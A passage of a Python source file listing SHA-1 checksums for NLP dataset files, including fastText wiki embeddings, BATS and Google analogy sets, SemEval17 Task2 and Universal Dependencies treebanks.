'0063d0b633ee529a75482b36ed4f4da7d64994ec'),
'wiki.pih': ('wiki.pih.npz',
'ce1d76c94d248545eea0d7436c54849dbb380bfc'),
'wiki.pi': ('wiki.pi.npz',
'c7d56c334bf529f8b3655693d207a80feaec4aed'),
'wiki.pl': ('wiki.pl.npz',
'0d612fdf871a1a4084c867f394940475be899443'),
'wiki.pms': ('wiki.pms.npz',
'ca149a2fb138011315bb6d5d61c7a5647e515e51'),
'wiki.pnb': ('wiki.pnb.npz',
'9ec82d02ad8894056c67991cf8ce927bcca74ee2'),
'wiki.pnt': ('wiki.pnt.npz',
'3f90123407bb8fc838a0a0d3700a14e15f5b26aa'),
'wiki.ps': ('wiki.ps.npz',
'7edebc02ac16f5fab83eb10b7d0fab821a9a4d43'),
'wiki.pt': ('wiki.pt.npz',
'f172fd801edd1ad9d319ba44146d40b5d682a473'),
'wiki.qu': ('wiki.qu.npz',
'68bec60ccfe1826c3b3a8968574488dbc74cdf7b'),
'wiki.rm': ('wiki.rm.npz',
'00fb191fc736ba60cb23e76169dfccde9a9daad0'),
'wiki.rmy': ('wiki.rmy.npz',
'c5e93cc37ff7293b9a1d9fe55c42d6fbde372b97'),
'wiki.rn': ('wiki.rn.npz',
'57b8e0d6999269be227af6ef2797a9cf8386ff1b'),
'wiki.roa_rup': ('wiki.roa_rup.npz',
'e06d6b5672a59bb9e83143bc8b28300d23c09546'),
'wiki.roa_tara': ('wiki.roa_tara.npz',
'c083105f40236dc3711f06c1b40e8ee7a714b99d'),
'wiki.ro': ('wiki.ro.npz',
'766bc0cb58a65b0b1763b9a0d90e91ab982eb20d'),
'wiki.rue': ('wiki.rue.npz',
'9a91fa093cd48d7d658d526b0ccda48dc59cd7f4'),
'wiki.ru': ('wiki.ru.npz',
'd59d099481c22d5592ab9635c9ee48060aa0bf45'),
'wiki.rw': ('wiki.rw.npz',
'e99ee87d249f6c157c5c97397d1025d798b85c69'),
'wiki.sah': ('wiki.sah.npz',
'85dae39097b29bc8e2b64f343a77794e4a62f91a'),
'wiki.sa': ('wiki.sa.npz',
'7d1928d7c67400045ac1b35a37a0e3089690d875'),
'wiki.scn': ('wiki.scn.npz',
'27d7b8050bbeed8ce196061c610216760b053c39'),
'wiki.sc': ('wiki.sc.npz',
'69c7b8be0f03a1bbd615695f93bdd78f96a58e16'),
'wiki.sco': ('wiki.sco.npz',
'4880282f59d3338b67fbff75359e2d24896e95bb'),
'wiki.sd': ('wiki.sd.npz',
'0ed8da4d27223db717a612cf0c88582351db6e19'),
'wiki.se': ('wiki.se.npz',
'0f4b2e060d5e29f96ca73aab29c967e79db69c17'),
'wiki.sg': ('wiki.sg.npz',
'a5e4edf34fe1a88b322da4c3922ec5a470e200c6'),
'wiki.sh': ('wiki.sh.npz',
'c13f1e94676bc939560193f7aa7ffd7d604707b3'),
'wiki.simple': ('wiki.simple.npz',
'352d0575e7d60b08e1dfce2c5de713906f0ed78f'),
'wiki.si': ('wiki.si.npz',
'204f9ffbe7770a9f56d3b2fb26999165015f5c33'),
'wiki.sk': ('wiki.sk.npz',
'7a9820b5a343b242660bf2595d1ecbf6e00a76d6'),
'wiki.sl': ('wiki.sl.npz',
'85f3186f26d6725317a64e290363a7251b928b81'),
'wiki.sm': ('wiki.sm.npz',
'9e13452cc4bff677f4f15db04f9d2f95f6ec054c'),
'wiki.sn': ('wiki.sn.npz',
'e8d5f7dcf51280c5f99bc3df849b4889a61e9fcd'),
'wiki.so': ('wiki.so.npz',
'0f5d71b95768b33fd939a870c15344c4478364a9'),
'wiki.sq': ('wiki.sq.npz',
'8b05826df8575e65c87a2fc0b7630cf644d4216d'),
'wiki.srn': ('wiki.srn.npz',
'2711396ef297ac5dde8904508bc002bdecbcc6f4'),
'wiki.sr': ('wiki.sr.npz',
'546edc8e29a5d2e99ed10eb4a552cbef2bb8f417'),
'wiki.ss': ('wiki.ss.npz',
'2e5911bad79bb5270a64f587e326d31c95ec58f3'),
'wiki.st': ('wiki.st.npz',
'23bc954719a2962e891f02efaea754c9ea025894'),
'wiki.stq': ('wiki.stq.npz',
'dd3ece0c0aa30e53ae0f4b558309bb60ab628652'),
'wiki.su': ('wiki.su.npz',
'7e48732e8a1fcf212e692924a4416a6ac3b3b055'),
'wiki.sv': ('wiki.sv.npz',
'b9ec52e9423688f195f3145c243226c0e0b51e83'),
'wiki.sw': ('wiki.sw.npz',
'5262f0c645322b10eca73f792a970f10b2719e55'),
'wiki.szl': ('wiki.szl.npz',
'fdd6d6b291cdbbcec5ff93451a588fdd103bb2d0'),
'wiki.ta': ('wiki.ta.npz',
'da7c5bc6e1142306ff2669bf1739832beb6c1763'),
'wiki.tcy': ('wiki.tcy.npz',
'baa49e1afa2bb0dcaaef0fac1ee75bbe711d1134'),
'wiki.te': ('wiki.te.npz',
'baf48767ce85e4d41d65d25f2bbf1c5f559ec18f'),
'wiki.tet': ('wiki.tet.npz',
'11e46a893af55344dbe102d530fdfea5d949d3bc'),
'wiki.tg': ('wiki.tg.npz',
'da66abb72ec9ccc602713161e544963d59cc51d7'),
'wiki.th': ('wiki.th.npz',
'25e54bf2d305779ec9baa5f344410bd75c7702fc'),
'wiki.ti': ('wiki.ti.npz',
'1faf98f3a0eafa7559a4b2a111f43dd1f7b9a05b'),
'wiki.tk': ('wiki.tk.npz',
'34c714fa8275fd6abfe86b2d144a043774552a6c'),
'wiki.tl': ('wiki.tl.npz',
'7d7f8a0485155bce7a74a1d778824375b0029f53'),
'wiki.tn': ('wiki.tn.npz',
'd0bc3a9b948753ac2283e5e10480c9fa0f6acb53'),
'wiki.to': ('wiki.to.npz',
'e982fc31bcfcf7339988d7aad21ce29ac9e84b0b'),
'wiki.tpi': ('wiki.tpi.npz',
'448cef043fa4b7f97825dbf8ee205ef05543bcac'),
'wiki.tr': ('wiki.tr.npz',
'c9830607a4c5134c6191006f1d80bae0ec798fe6'),
'wiki.ts': ('wiki.ts.npz',
'84a0598803712c8a713943447ddb73fc0f39af43'),
'wiki.tt': ('wiki.tt.npz',
'82c29df18f33e6284af3e977a6dda7e132a7a225'),
'wiki.tum': ('wiki.tum.npz',
'358990b894a3fb09d70674465952d828c9b0eda7'),
'wiki.tw': ('wiki.tw.npz',
'1e6d2838a4f271c1808795fb929cfcbf95094d93'),
'wiki.ty': ('wiki.ty.npz',
'e41ca5192d8cb515b3561c8d6935b150deb027b7'),
'wiki.tyv': ('wiki.tyv.npz',
'ce062ed32e854604714b65698ae290c99ba28060'),
'wiki.udm': ('wiki.udm.npz',
'9e1c5891ee0c5ac8f65fc457e1b42c7b2bfc8d37'),
'wiki.ug': ('wiki.ug.npz',
'656503e54063e200980e39f00fc011395bcd8551'),
'wiki.uk': ('wiki.uk.npz',
'352b7ee24d9fc6513fff4fe13bc04086c680834a'),
'wiki.ur': ('wiki.ur.npz',
'a81e55c7adfc2cef779ce9a01fe21319a7e4943b'),
'wiki.uz': ('wiki.uz.npz',
'd60d1e67bb8574dd71c18c88114aba674fc1eecb'),
'wiki.ve': ('wiki.ve.npz',
'5bfc3dbb3e47d23597df47ef12bd1c64ab8d3ea9'),
'wiki.vep': ('wiki.vep.npz',
'7a94355754fbe56802242c0bf9d7a27335095552'),
'wiki.vi': ('wiki.vi.npz',
'f118039eb16a4ca3347b6b171eac41113350a041'),
'wiki.vls': ('wiki.vls.npz',
'9a46a2fdc6448aa54f212081643745499ea7d05c'),
'wiki.vo': ('wiki.vo.npz',
'8e2f93c85ac608bcc4ae14093b9ff016061378fb'),
'wiki.wa': ('wiki.wa.npz',
'907074f7743d30cdbb2c48d0c8b4040796ea4164'),
'wiki.war': ('wiki.war.npz',
'928fb410c394b9c18d875326b6a3e750e2611e1b'),
'wiki.wo': ('wiki.wo.npz',
'7bb352be44f7261aa926f49b13e77df30f29312f'),
'wiki.wuu': ('wiki.wuu.npz',
'0d1dc7b05867ff2156a1180ad3da3b4697924e59'),
'wiki.xal': ('wiki.xal.npz',
'd87f4a131e086dc0bdc2a7e10406820c3c03b6a9'),
'wiki.xh': ('wiki.xh.npz',
'c64e1d2e77d1c744a628e2bd7353284616e48bea'),
'wiki.xmf': ('wiki.xmf.npz',
'160b9ee9773b9099aaf37ae9bdbc8a4a93b7f6ea'),
'wiki.yi': ('wiki.yi.npz',
'0662542cee29f3392fc905004ac6443b32c1477c'),
'wiki.yo': ('wiki.yo.npz',
'5d12d3b902a1fa19d8548295c3802c0608afa5c8'),
'wiki.za': ('wiki.za.npz',
'536348ff89df62e968739b567a1245bfd4112fbe'),
'wiki.zea': ('wiki.zea.npz',
'61fa192289a7c0f73ffa8035632a38b91c31c224'),
'wiki.zh_classical': ('wiki.zh_classical.npz',
'9acc9eaf8ebe316b945fb1f56ac71a2b7e024854'),
'wiki.zh_min_nan': ('wiki.zh_min_nan.npz',
'5d38bc025c82af578299d60f7df7b399de6ed81a'),
'wiki.zh': ('wiki.zh.npz',
'94007fcf3b105bf2c21b84a3a22bdb7946e74804'),
'wiki.zh_yue': ('wiki.zh_yue.npz',
'af6f0d94e6418d528d6cedd859e07e6e2fb416ab'),
'wiki.zu': ('wiki.zu.npz',
'fc9ce07d5d0c49a3c86cf1b26056ada58f9404ca')}
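# Category names of the Google word-analogy evaluation set.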
GOOGLEANALOGY_CATEGORIES = [
'capital-common-countries', 'capital-world', 'currency', 'city-in-state',
'family', 'gram1-adjective-to-adverb', 'gram2-opposite',
'gram3-comparative', 'gram4-superlative', 'gram5-present-participle',
'gram6-nationality-adjective', 'gram7-past-tense', 'gram8-plural',
'gram9-plural-verbs'
]
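# SHA-1 checksums of the BATS 3.0 (Bigger Analogy Test Set) category files.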
BATS_CHECKSUMS = \
{'BATS_3.0/1_Inflectional_morphology/I01 [noun - plural_reg].txt':
'cfcba2835edf81abf11b84defd2f4daa3ca0b0bf',
'BATS_3.0/1_Inflectional_morphology/I02 [noun - plural_irreg].txt':
'44dbc56432b79ff5ce2ef80b6840a8aa916524f9',
'BATS_3.0/1_Inflectional_morphology/I03 [adj - comparative].txt':
'dc530918e98b467b8102a7dab772a66d3db32a73',
'BATS_3.0/1_Inflectional_morphology/I04 [adj - superlative].txt':
'6c6fdfb6c733bc9b298d95013765163f42faf6fb',
'BATS_3.0/1_Inflectional_morphology/I05 [verb_inf - 3pSg].txt':
'39fa47ec7238ddb3f9818bc586f23f55b55418d8',
'BATS_3.0/1_Inflectional_morphology/I06 [verb_inf - Ving].txt':
'8fabeb9f5af6c3e7154a220b7034bbe5b900c36f',
'BATS_3.0/1_Inflectional_morphology/I07 [verb_inf - Ved].txt':
'aa04df95aa2edb436cbcc03c7b15bc492ece52d6',
'BATS_3.0/1_Inflectional_morphology/I08 [verb_Ving - 3pSg].txt':
'5f22d8121a5043ce76d3b6b53a49a7bb3fe33920',
'BATS_3.0/1_Inflectional_morphology/I09 [verb_Ving - Ved].txt':
'377777c1e793c638e72c010228156d01f916708e',
'BATS_3.0/1_Inflectional_morphology/I10 [verb_3pSg - Ved].txt':
'051c0c3c633e10900f827991dac14cf76da7f022',
'BATS_3.0/2_Derivational_morphology/D01 [noun+less_reg].txt':
'5d6839e9d34ee1e9fddb5bbf6516cf6420b85d8d',
'BATS_3.0/2_Derivational_morphology/D02 [un+adj_reg].txt':
'80b82227a0d5f7377f1e8cebe28c582bfeb1afb5',
'BATS_3.0/2_Derivational_morphology/D03 [adj+ly_reg].txt':
'223e120bd61b3116298a253f392654c15ad5a39a',
'BATS_3.0/2_Derivational_morphology/D04 [over+adj_reg].txt':
'a56f8685af489bcd09c36f864eba1657ce0a7c28',
'BATS_3.0/2_Derivational_morphology/D05 [adj+ness_reg].txt':
'5da99b1f1781ecfb4a1a7448c715abf07451917b',
'BATS_3.0/2_Derivational_morphology/D06 [re+verb_reg].txt':
'4c5e1796091fade503fbf0bfc2fae2c7f98b5dd2',
'BATS_3.0/2_Derivational_morphology/D07 [verb+able_reg].txt':
'a6218162bc257d98e875fc667c23edfac59e19fd',
'BATS_3.0/2_Derivational_morphology/D08 [verb+er_irreg].txt':
'9a4236c3bbc23903e101a42fb5ad6e15e552fadf',
'BATS_3.0/2_Derivational_morphology/D09 [verb+tion_irreg].txt':
'3ab0153926d5cf890cf08a4077da6d9946133874',
'BATS_3.0/2_Derivational_morphology/D10 [verb+ment_irreg].txt':
'2a012b87a9a60e128e064c5fe24b60f99e16ddce',
'BATS_3.0/3_Encyclopedic_semantics/E01 [country - capital].txt':
'9890315d3c4e6a38b8ae5fc441858564be3d3dc4',
'BATS_3.0/3_Encyclopedic_semantics/E02 [country - language].txt':
'ef08a00e8ff7802811ace8f00fabac41b5d03678',
'BATS_3.0/3_Encyclopedic_semantics/E03 [UK_city - county].txt':
'754957101c93a25b438785bd4458404cd9010259',
'BATS_3.0/3_Encyclopedic_semantics/E04 [name - nationality].txt':
'71a6562c34fb6154992a7c3e499375fcc3529c96',
'BATS_3.0/3_Encyclopedic_semantics/E05 [name - occupation].txt':
'a9a6f9f1af959aef83106f3dbd6bed16dfe9a3ea',
'BATS_3.0/3_Encyclopedic_semantics/E06 [animal - young].txt':
'12d5b51c7b76b9136eadc719abc8cf4806c67b73',
'BATS_3.0/3_Encyclopedic_semantics/E07 [animal - sound].txt':
'91991b007a35f45bd42bd7d0d465c6f8311df911',
'BATS_3.0/3_Encyclopedic_semantics/E08 [animal - shelter].txt':
'e5af11e216db392986ba0cbb597d861066c29adb',
'BATS_3.0/3_Encyclopedic_semantics/E09 [things - color].txt':
'd30b2eb2fc7a60f19afda7c54582e30f6fe28f51',
'BATS_3.0/3_Encyclopedic_semantics/E10 [male - female].txt':
'247a588671bc1da8f615e14076bd42573d24b4b3',
'BATS_3.0/4_Lexicographic_semantics/L01 [hypernyms - animals].txt':
'4b5c4dabe2c9c038fafee85d8d3958f1b1dec987',
'BATS_3.0/4_Lexicographic_semantics/L02 [hypernyms - misc].txt':
'83d5ecad78d9de28fd70347731c7ee5918ba43c9',
'BATS_3.0/4_Lexicographic_semantics/L03 [hyponyms - misc].txt':
'a8319856ae2f76b4d4c030ac7e899bb3a06a9a48',
'BATS_3.0/4_Lexicographic_semantics/L04 [meronyms - substance].txt':
'c081e1104e1b40725063f4b39d13d1ec12496bfd',
'BATS_3.0/4_Lexicographic_semantics/L05 [meronyms - member].txt':
'bcbf05f3be76cef990a74674a9999a0bb9790a07',
'BATS_3.0/4_Lexicographic_semantics/L06 [meronyms - part].txt':
'2f9bdcc74b881e1c54b391c9a6e7ea6243b3accc',
'BATS_3.0/4_Lexicographic_semantics/L07 [synonyms - intensity].txt':
'8fa287860b096bef004fe0f6557e4f686e3da81a',
'BATS_3.0/4_Lexicographic_semantics/L08 [synonyms - exact].txt':
'a17c591961bddefd97ae5df71f9d1559ce7900f4',
'BATS_3.0/4_Lexicographic_semantics/L09 [antonyms - gradable].txt':
'117fbb86504c192b33a5469f2f282e741d9c016d',
'BATS_3.0/4_Lexicographic_semantics/L10 [antonyms - binary].txt':
'3cde2f2c2a0606777b8d7d11d099f316416a7224'}
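# Human-readable names for the BATS category codes used above.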
BATS_CATEGORIES = {
'I01': '[noun - plural_reg]',
'I02': '[noun - plural_irreg]',
'I03': '[adj - comparative]',
'I04': '[adj - superlative]',
'I05': '[verb_inf - 3pSg]',
'I06': '[verb_inf - Ving]',
'I07': '[verb_inf - Ved]',
'I08': '[verb_Ving - 3pSg]',
'I09': '[verb_Ving - Ved]',
'I10': '[verb_3pSg - Ved]',
'D01': '[noun+less_reg]',
'D02': '[un+adj_reg]',
'D03': '[adj+ly_reg]',
'D04': '[over+adj_reg]',
'D05': '[adj+ness_reg]',
'D06': '[re+verb_reg]',
'D07': '[verb+able_reg]',
'D08': '[verb+er_irreg]',
'D09': '[verb+tion_irreg]',
'D10': '[verb+ment_irreg]',
'E01': '[country - capital]',
'E02': '[country - language]',
'E03': '[UK_city - county]',
'E04': '[name - nationality]',
'E05': '[name - occupation]',
'E06': '[animal - young]',
'E07': '[animal - sound]',
'E08': '[animal - shelter]',
'E09': '[things - color]',
'E10': '[male - female]',
'L01': '[hypernyms - animals]',
'L02': '[hypernyms - misc]',
'L03': '[hyponyms - misc]',
'L04': '[meronyms - substance]',
'L05': '[meronyms - member]',
'L06': '[meronyms - part]',
'L07': '[synonyms - intensity]',
'L08': '[synonyms - exact]',
'L09': '[antonyms - gradable]',
'L10': '[antonyms - binary]'
}
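# SHA-1 checksums of the SemEval17-Task2 data, gold-key and scorer files.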
SEMEVAL17_CHECKSUMS = \
{'SemEval17-Task2/README.txt':
'ad02d4c22fff8a39c9e89a92ba449ec78750af6b',
'SemEval17-Task2/task2-scorer.jar':
'145ef73ce955656d59e3b67b41f8152e8ee018d8',
'SemEval17-Task2/test/subtask1-monolingual/data/de.test.data.txt':
'6fc840f989d2274509549e472a68fb88dd2e149f',
'SemEval17-Task2/test/subtask1-monolingual/data/en.test.data.txt':
'05293fcbd80b2f4aad9b6518ce1a546ad8f61f33',
'SemEval17-Task2/test/subtask1-monolingual/data/es.test.data.txt':
'552904b5988f9951311290ca8fa0441dd4351d4b',
'SemEval17-Task2/test/subtask1-monolingual/data/fa.test.data.txt':
'29d5970feac5982961bd6ab621ba31f83d3bff77',
'SemEval17-Task2/test/subtask1-monolingual/data/it.test.data.txt':
'c95fe2be8fab37e9c70610117bdedc48a0a8e95c',
'SemEval17-Task2/test/subtask1-monolingual/keys/de.test.gold.txt':
'c51463460495a242cc726d41713c5e00b66fdd18',
'SemEval17-Task2/test/subtask1-monolingual/keys/en.test.gold.txt':
'2d2bb2ed41308cc60e7953cc9036f7dc89141b48',
'SemEval17-Task2/test/subtask1-monolingual/keys/es.test.gold.txt':
'a5842ff17fe3847d15414924826a8eb236018bcc',
'SemEval17-Task2/test/subtask1-monolingual/keys/fa.test.gold.txt':
'717bbe035d8ae2bad59416eb3dd4feb7238b97d4',
'SemEval17-Task2/test/subtask1-monolingual/keys/it.test.gold.txt':
'a342b950109c73afdc86a7829e17c1d8f7c482f0',
'SemEval17-Task2/test/subtask2-crosslingual/data/de-es.test.data.txt':
'ef92b1375762f68c700e050d214d3241ccde2319',
'SemEval17-Task2/test/subtask2-crosslingual/data/de-fa.test.data.txt':
'17aa103981f3193960309bb9b4cc151acaf8136c',
'SemEval17-Task2/test/subtask2-crosslingual/data/de-it.test.data.txt':
'eced15e8565689dd67605a82a782d19ee846222a',
'SemEval17-Task2/test/subtask2-crosslingual/data/en-de.test.data.txt':
'5cb69370a46385a7a3d37cdf2018744be77203a0',
'SemEval17-Task2/test/subtask2-crosslingual/data/en-es.test.data.txt':
'402f7fed52b60e915fb1be49f935395488cf7a7b',
'SemEval17-Task2/test/subtask2-crosslingual/data/en-fa.test.data.txt':
'9bdddbbde3da755f2a700bddfc3ed1cd9324ad48',
'SemEval17-Task2/test/subtask2-crosslingual/data/en-it.test.data.txt':
'd3b37aac79ca10311352309ef9b172f686ecbb80',
'SemEval17-Task2/test/subtask2-crosslingual/data/es-fa.test.data.txt':
'a2959aec346c26475a4a6ad4d950ee0545f2381e',
'SemEval17-Task2/test/subtask2-crosslingual/data/es-it.test.data.txt':
'ca627c30143d9f82a37a8776fabf2cee226dd35c',
'SemEval17-Task2/test/subtask2-crosslingual/data/it-fa.test.data.txt':
'a03d79a6ce7b798356b53b4e85dbe828247b97ef',
'SemEval17-Task2/test/subtask2-crosslingual/keys/de-es.test.gold.txt':
'7564130011d38daad582b83135010a2a58796df6',
'SemEval17-Task2/test/subtask2-crosslingual/keys/de-fa.test.gold.txt':
'c9e23c2e5e970e7f95550fbac3362d85b82cc569',
'SemEval17-Task2/test/subtask2-crosslingual/keys/de-it.test.gold.txt':
'b74cc2609b2bd2ceb5e076f504882a2e0a996a3c',
'SemEval17-Task2/test/subtask2-crosslingual/keys/en-de.test.gold.txt':
'428dfdad2a144642c13c24b845e6b7de6bf5f663',
'SemEval17-Task2/test/subtask2-crosslingual/keys/en-es.test.gold.txt':
'1dd7ab08a10552486299151cdd32ed19b56db682',
'SemEval17-Task2/test/subtask2-crosslingual/keys/en-fa.test.gold.txt':
'17451ac2165aa9b695dae9b1aba20eb8609fb400',
'SemEval17-Task2/test/subtask2-crosslingual/keys/en-it.test.gold.txt':
'5041c0b84a603ed85aa0a5cbe4b1c34f69a2fa7c',
'SemEval17-Task2/test/subtask2-crosslingual/keys/es-fa.test.gold.txt':
'8c09a219670dc32ab3864078bf0c28a287accabc',
'SemEval17-Task2/test/subtask2-crosslingual/keys/es-it.test.gold.txt':
'b1cdd13209354cc2fc2f4226c80aaa85558daf4a',
'SemEval17-Task2/test/subtask2-crosslingual/keys/it-fa.test.gold.txt':
'e0b560bb1d2db39ce45e841c8aad611734dc94f1',
'SemEval17-Task2/trial/subtask1-monolingual/data/de.trial.data.txt':
'dd071fd90f59bec8d271a447d86ee2e462941f52',
'SemEval17-Task2/trial/subtask1-monolingual/data/en.trial.data.txt':
'e8e5add0850b3dec07f102be26b8791a5e9bbbcf',
'SemEval17-Task2/trial/subtask1-monolingual/data/es.trial.data.txt':
'8956c78ff9ceae1d923a57816e55392c6a7dfc49',
'SemEval17-Task2/trial/subtask1-monolingual/data/fa.trial.data.txt':
'2f7c4247cde0d918b3508e90f6b49a1f5031c81b',
'SemEval17-Task2/trial/subtask1-monolingual/data/it.trial.data.txt':
'c11e0b5b55f94fc97c7b11fa455e71b071be879f',
'SemEval17-Task2/trial/subtask1-monolingual/keys/de.trial.gold.txt':
'ce5567b1accf3eb07da53229dfcb2a8a1dfac380',
'SemEval17-Task2/trial/subtask1-monolingual/keys/en.trial.gold.txt':
'693cb5928e807c79e39136dc0981dadca7832ae6',
'SemEval17-Task2/trial/subtask1-monolingual/keys/es.trial.gold.txt':
'8241ca66bf5ba55f77607e9bcfae8e34902715d8',
'SemEval17-Task2/trial/subtask1-monolingual/keys/fa.trial.gold.txt':
'd30701a93c8c5500b82ac2334ed8410f9a23864b',
'SemEval17-Task2/trial/subtask1-monolingual/keys/it.trial.gold.txt':
'bad225573e1216ba8b35429e9fa520a20e8ce031',
'SemEval17-Task2/trial/subtask1-monolingual/output/de.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask1-monolingual/output/en.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask1-monolingual/output/es.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask1-monolingual/output/fa.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask1-monolingual/output/it.trial.sample.output.txt':
'f85cba9f6690d61736623c16e620826b09384aa5',
'SemEval17-Task2/trial/subtask2-crosslingual/data/de-es.trial.data.txt':
'c27c8977d8d4434fdc3e59a7b0121d87e0a03237',
'SemEval17-Task2/trial/subtask2-crosslingual/data/de-fa.trial.data.txt':
'88a6f6dd1bba309f7cae7281405e37f442782983',
'SemEval17-Task2/trial/subtask2-crosslingual/data/de-it.trial.data.txt':
'ebdab0859f3b349fa0120fc8ab98be3394f0d73d',
'SemEval17-Task2/trial/subtask2-crosslingual/data/en-de.trial.data.txt':
'128d1a460fe9836b66f0fcdf59455b02edb9f258',
'SemEval17-Task2/trial/subtask2-crosslingual/data/en-es.trial.data.txt':
'508c5dde8ffcc32ee3009a0d020c7c96a338e1d1',
'SemEval17-Task2/trial/subtask2-crosslingual/data/en-fa.trial.data.txt':
'1a3640eb5facfe15b1e23a07183a2e62ed80c7d9',
'SemEval17-Task2/trial/subtask2-crosslingual/data/en-it.trial.data.txt':
'141c83d591b0292016583d9c23a2cc5514a006aa',
'SemEval17-Task2/trial/subtask2-crosslingual/data/es-fa.trial.data.txt':
'a0a548cd698c389ee80c34d6ec72abed5f1625e5',
'SemEval17-Task2/trial/subtask2-crosslingual/data/es-it.trial.data.txt':
'8d42bed8a43ff93d26ca95794758d9392ca707ed',
'SemEval17-Task2/trial/subtask2-crosslingual/data/it-fa.trial.data.txt':
'9c85223f1f734de61c28157df0ce417bb0537803',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-es.trial.gold.txt':
'126c92b2fb3b8f2784dd4ae2a4c52b02a87a8196',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-fa.trial.gold.txt':
'1db6201c2c8f19744c39dbde8bd4a803859d64c1',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-it.trial.gold.txt':
'5300bf2ead163ff3981fb41ec5d0e291c287c9e0',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-de.trial.gold.txt':
'd4f5205de929bb0c4020e1502a3f2204b5accd51',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-es.trial.gold.txt':
'3237e11c3a0d9c0f5d583f8dc1d025b97a1f8bfe',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-fa.trial.gold.txt':
'c14de7bf326907336a02d499c9b92ab229f3f4f8',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-it.trial.gold.txt':
'3c0276c4b4e7a6d8a618bbe1ab0f30ad7b07929c',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-fa.trial.gold.txt':
'359f69e9dfd6411a936baa3392b8f05c398a7707',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-it.trial.gold.txt':
'44090607fabe5a26926a384e521ef1317f6f00d0',
'SemEval17-Task2/trial/subtask2-crosslingual/keys/it-fa.trial.gold.txt':
'97b09ffa11803023c2143fd4a4ac4bbc9775e645',
'SemEval17-Task2/trial/subtask2-crosslingual/output/de-es.trial.sample.output.txt':
'a0735361a692be357963959728dacef85ea08240',
'SemEval17-Task2/trial/subtask2-crosslingual/output/de-fa.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/de-it.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/en-de.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/en-es.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/en-fa.trial.sample.output.txt':
'a0735361a692be357963959728dacef85ea08240',
'SemEval17-Task2/trial/subtask2-crosslingual/output/en-it.trial.sample.output.txt':
'a0735361a692be357963959728dacef85ea08240',
'SemEval17-Task2/trial/subtask2-crosslingual/output/es-fa.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/es-it.trial.sample.output.txt':
'b71166d8615e921ee689cefc81419398d341167f',
'SemEval17-Task2/trial/subtask2-crosslingual/output/it-fa.trial.sample.output.txt':
'a0735361a692be357963959728dacef85ea08240'}
UD21_DATA_FILE_SHA1 = \
{'af': {'dev': ('af-ud-dev.conllu',
'e37b104f4425ee00afc81779201816d5ac525194'),
'test': ('af-ud-test.conllu',
'd2bf02370d308ee957c04242bd0871db0e488389'),
'train': ('af-ud-train.conllu',
'a652c7b19c236063d3ea489947f83095893b699a')},
'grc_proiel': {'dev': ('grc_proiel-ud-dev.conllu',
'd199530c7e40ff0214e510957bb126af0dc12c1c'),
'test': ('grc_proiel-ud-test.conllu',
'bb7825ddeb18fc2d86638e4725f04563f3e08aab'),
'train': ('grc_proiel-ud-train.conllu',
'fe6c861299b033abe8c4ce2b6131cd74f87b96a7')},
'grc': {'dev': ('grc-ud-dev.conllu',
'debdfec0272cd558ccd29fe0ae2f13175dd20a33'),
'test': ('grc-ud-test.conllu',
'f19accf31db95e2c736d716d3438c09aa877eb07'),
'train': ('grc-ud-train.conllu',
'e98d3eabea67787c5d43a498f5a0fa4246f38104')},
'ar_nyuad': {'dev': ('ar_nyuad-ud-dev.conllu',
'b740de9bd68e68b30b9b313eb050d44e94470ca5'),
'test': ('ar_nyuad-ud-test.conllu',
'f5d5b8979b7fedd76235d4bae77e0b4a7b0a750a'),
'train': ('ar_nyuad-ud-train.conllu',
'd065f03958fd8782a7431b6778c6665ad09444a6')},
'ar_pud': {'test': ('ar_pud-ud-test.conllu',
'2161701e6726b6feb14733a312fba6160b9eb722')},
'ar': {'dev': ('ar-ud-dev.conllu',
'5f8964974d5ba5eb3504cdafb93c34c473c4177c'),
'test': ('ar-ud-test.conllu',
'58df161047f310cc3bb4d0e615ca33466e630bb9'),
'train': ('ar-ud-train.conllu',
'0a3d5cefa1fecd6a74f2016ee73ea7a7a02eb359')},
'eu': {'dev': ('eu-ud-dev.conllu',
'3ee15b5ed46ec93d7278c8cc0351d242417d553d'),
'test': ('eu-ud-test.conllu',
'aa68d6442ac6dc1abedc19c1b98c4a9944786188'),
'train': ('eu-ud-train.conllu',
'd56ec997916e38ee6ab1badd78c119e81e4797c9')},
'be': {'dev': ('be-ud-dev.conllu',
'015473e91cf8937c46e8b721f206415abac16a35'),
'test': ('be-ud-test.conllu',
'f009ea1885f54cfd77fca8a2c89133b2af8f9f5e'),
'train': ('be-ud-train.conllu',
'26b871e28d2f356a709f106b6e3e86b417ba74e7')},
'bg': {'dev': ('bg-ud-dev.conllu',
'0a2284b10547681eb65691eb2a9f0f1662e16e90'),
'test': ('bg-ud-test.conllu',
'75ea2a5e1d55bb57efecae6ec2b5ac3cc1b37e57'),
'train': ('bg-ud-train.conllu',
'd4b2fa267010c4486885c91f3af65ff66c8be94c')},
'bxr': {'sample': ('bxr-ud-sample.conllu',
'9239bdd251a60820c71111ec54de9e7d58a8579d'),
'test': ('bxr-ud-test.conllu',
'0a06e527454ae0b547153222f67eb5db94e528fd')},
'yue': {'test': ('yue-ud-test.conllu',
'd91477c65aa75cd45489cca13f7a122066972bdb')},
'ca': {'dev': ('ca-ud-dev.conllu',
